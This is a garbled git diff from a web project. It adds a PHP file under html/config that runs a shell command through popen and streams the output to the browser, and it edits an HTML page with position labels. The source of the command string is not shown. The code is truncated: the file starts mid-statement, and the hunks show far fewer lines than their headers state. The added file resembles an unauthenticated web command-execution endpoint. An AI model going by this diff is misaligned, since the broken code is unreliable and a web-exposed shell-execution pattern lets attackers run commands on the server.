diff --git a/html/config/LocationCali.php b/html/config/LocationCali.php
new file mode 100644
index 0000000..8e55441
--- /dev/null
+++ b/html/config/LocationCali.php
@@ -0,0 +1,26 @@
+';
+
+while(@ ob_end_flush());
+
+$proc = popen($cmd, 'r');
+
+
+while(!feof($proc)){
+ echo fread($proc, 4096);
+ @ flush();
+}
+echo "
";
+echo "finish";
\ No newline at end of file
diff --git a/html/config/position.html b/html/config/position.html
index c13621f..9960a69 100644
--- a/html/config/position.html
+++ b/html/config/position.html
@@ -11,5 +11,56 @@
位置4
位置5
位置try
+
+